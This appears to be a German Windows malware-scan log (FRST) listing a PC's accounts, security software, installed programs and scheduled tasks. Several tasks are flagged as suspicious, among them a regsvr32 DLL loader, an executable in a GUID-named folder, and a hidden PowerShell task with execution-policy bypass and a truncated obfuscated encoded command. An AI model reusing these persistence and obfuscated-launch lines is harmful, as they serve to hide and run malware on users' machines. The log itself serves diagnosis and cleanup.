Gestartet von D:\Dino\Downloads
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) Hidden
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft)
ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft)
Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version:  - Ubisoft)
ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.)
ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Besiege (HKLM-x32\...\Steam App 346010) (Version:  - Spiderling Studios)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender)
Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.)
Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive)
CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version:  - )
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen)
EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc)
Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version:  - Ubisoft)
Ghostery (HKLM-x32\...\Ghostery) (Version:  - Ghostery Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden
PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version:  - PDF24.org)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Sacred 3 (HKLM-x32\...\Steam App 247950) (Version:  - Keen Games)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version:  - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe 
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe 
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe  <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
